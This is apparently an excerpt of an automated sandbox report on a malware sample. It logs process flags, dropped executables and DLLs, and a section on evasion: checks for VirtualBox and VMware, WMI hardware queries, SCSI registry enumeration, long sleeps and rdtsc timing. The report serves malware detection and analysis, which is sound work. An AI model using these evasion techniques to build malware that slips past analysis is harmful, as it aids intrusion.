Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2899.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2899.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2899.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2899.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
Source: vusretg, 00000005.00000002.2370496284.000000000061E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK
Source: F3CC.exe, 00000026.00000002.2802923513.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKOJ'W
Source: 2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vusretg	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\F3CC.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\explorer.exe TID: 616	Thread sleep time: -316400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3136	Thread sleep time: -57800s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 744	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 6368	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe TID: 5612	Thread sleep count: 9255 > 30
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe TID: 5612	Thread sleep time: -277650000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe TID: 7040	Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe TID: 5548	Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\958B.exe TID: 5856	Thread sleep time: -700000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_8-45030
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_7-39236

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Thread delayed: delay time: 700000

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 397	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3164	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 578	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 874	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 864	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 5243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Window / User API: threadDelayed 2317
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Window / User API: threadDelayed 9255

Source: C:\Users\user\AppData\Local\Temp\A079.exe

API coverage: 6.0 %

Source: C:\Users\user\AppData\Local\Temp\5DA4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\treelatest.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\setup[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000112001\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B184.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build3[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 7_2_0226471C rdtsc

7_2_0226471C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\2899.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

8_2_0040E670

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Thread delayed: delay time: 700000

Source: C:\Users\user\AppData\Local\Temp\958B.exe	API call chain: ExitProcess graph end node			graph_7-39447
Source: C:\Users\user\AppData\Local\Temp\958B.exe	API call chain: ExitProcess graph end node			graph_8-45032

